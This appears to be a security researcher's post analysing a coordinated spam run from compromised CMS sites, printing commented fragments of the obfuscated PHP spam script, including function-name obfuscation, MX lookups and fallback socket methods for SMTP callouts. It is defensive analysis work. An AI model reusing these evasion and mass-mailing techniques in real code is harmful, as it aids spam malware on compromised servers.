Yesterday we saw a large number of infected domains sending a massive spam run in what appeared to be a coordinated effort. Signs of a large-scale targeted effort included:
- Sharp upticks of outbound spam requests occurring at once across multiple domains
- The same script being used across disparate victims
- A large sampling of IPs submitting malicious requests (a sample has been submitted to the ISC)
It appears that attackers build a spam botnet using a variety of attack vectors; we noted a range of compromised CMS systems, as well as stolen account credentials used to submit mail requests. This indicates that, rather than targeting a specific source installation, the attackers worked to build a bot from whatever resources they could, then mashed ‘go’ all at once. The source script was moderately obfuscated PHP; I’m working to reverse it now to search for clues regarding the source or author.
There’s nothing overly clever in it, but an initial overview found a few interesting points. The script was designed to be flexible and stealthy, finding the MX records of the infected domain (as opposed to hammer the server’s mail() function), and making use of awareness of disabled functions to try multiple methods of SMTP callouts. We also see prerequisite obfuscation of function names like mail. A few snippets are available below; I will post full findings tonight (barring a Super Bowl of epic proportions). The original script (whitespace modified for readability) is available here.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
/* function names have been de-obfuscated for readability */ // this varaible is used as a function call later. note multiple forms of obfuscation as a form of detection evasion $mail = 'ma'.chr(105).'l'; if (!in_array('m'.'a'.'il', $disabled_functions)) { // returns if the param matches an IPv4 format // a much more verbose regex is used, likely as detection evasion // i left this parameter unedited as an example of the variable obfuscation present throughout the script function match_ip($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } // get the target server using MX records function get_mail_server($hostname) { global $disabled_functions; if (!in_array('getmxrr', $disabled_functions) && function_exists("getmxrr")) { @getmxrr($hostname, $mxhosts, $weight); if (count($mxhosts) === 0) { return '127.0.0.1'; } $record = array_keys($weight, min($weight)); return $mxhosts[$record[0]]; } else { return '127.0.0.1'; } } // use of disabled_functions to determine the best route to make SMTP callout. note the fail if no primitive is available if (!in_array('fsockopen', $disabled_functions)) { $mail_socket = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); } elseif (!in_array('pfsockopen', $disabled_functions)) { $mail_socket = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); } elseif (!in_array('stream_socket_client', $disabled_functions) && function_exists("stream_socket_client")) { $mail_socket = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); } else { return -1; } |
If anyone else noticed any odd behavior yesterday as well please feel free to chime in.